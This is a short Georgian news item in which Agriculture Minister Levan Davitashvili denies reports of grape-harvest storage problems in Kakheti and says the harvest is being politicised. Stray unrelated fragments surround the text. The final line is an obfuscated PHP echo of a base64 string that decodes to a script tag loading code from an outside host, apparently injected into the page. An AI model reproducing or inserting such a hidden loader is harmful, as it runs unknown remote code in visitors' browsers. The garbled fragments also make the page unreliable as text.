celsiusi
ავერსი შნაიდერი
სამწუხაროდ, გვიწევს აღნიშვნა, რომ გავრცელდა ზოგიერთი მედიასაშულების მიერ დეზინფორმაცია, თითქოს მოწეული მოსავლის დაბინავებას პრობლემა აქვს კახეთში, – ამის შესახებ სოფლის მეურნეობის მინისტრმა, ლევან დავითაშვილმა განაცხადა.
 
მისი თქმით, რთველის პროცესის პოლიტიზება ხდება.
 
„წლების განმავლობაში ხდება ერთი რამ, რომ მიდის რთველი ორგანიზებულად, არც ერთი კილო ყურძნის ჩაბარებას პრობლემა არ ჰქონია 2012 წლიდან დღემდე, თუმცა არ ჩატარებულა არც ერთი რთველი ისე, რომ ცრუ ინფორმაცია არ გავრცელებულიყოს და პოლიტიზებული არ ყოფილიყოს რთველის მიმდინარეობის პროცესი. ძალიან სამწუხაროა ამის აღნიშვნა, მაგრამ ზოგიერთი პოლიტიკური ძალა რთველს, როდესაც ადამიანები მთელი წლის ნამუშევრის, ნაშრომის შედეგი უნდა მიიღონ, იყენებს საკუთარი პოლიტიკური მიზნებისთვის. ხშირად ცდილობენ, რომ ამაზე ააგონ თავიანთი პოლიტიკური დღის წესრიგი, მაგრამ ამის მიუხედავად, ჩვენ ვაკეთებთ იმის მაქსიმუმს, რაც გასაკეთებელია, ვდგავართ ჩვენი ფერმერების,  მევენახეების გვერდით“, – განაცხადა დავითაშვილმა.
1051
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");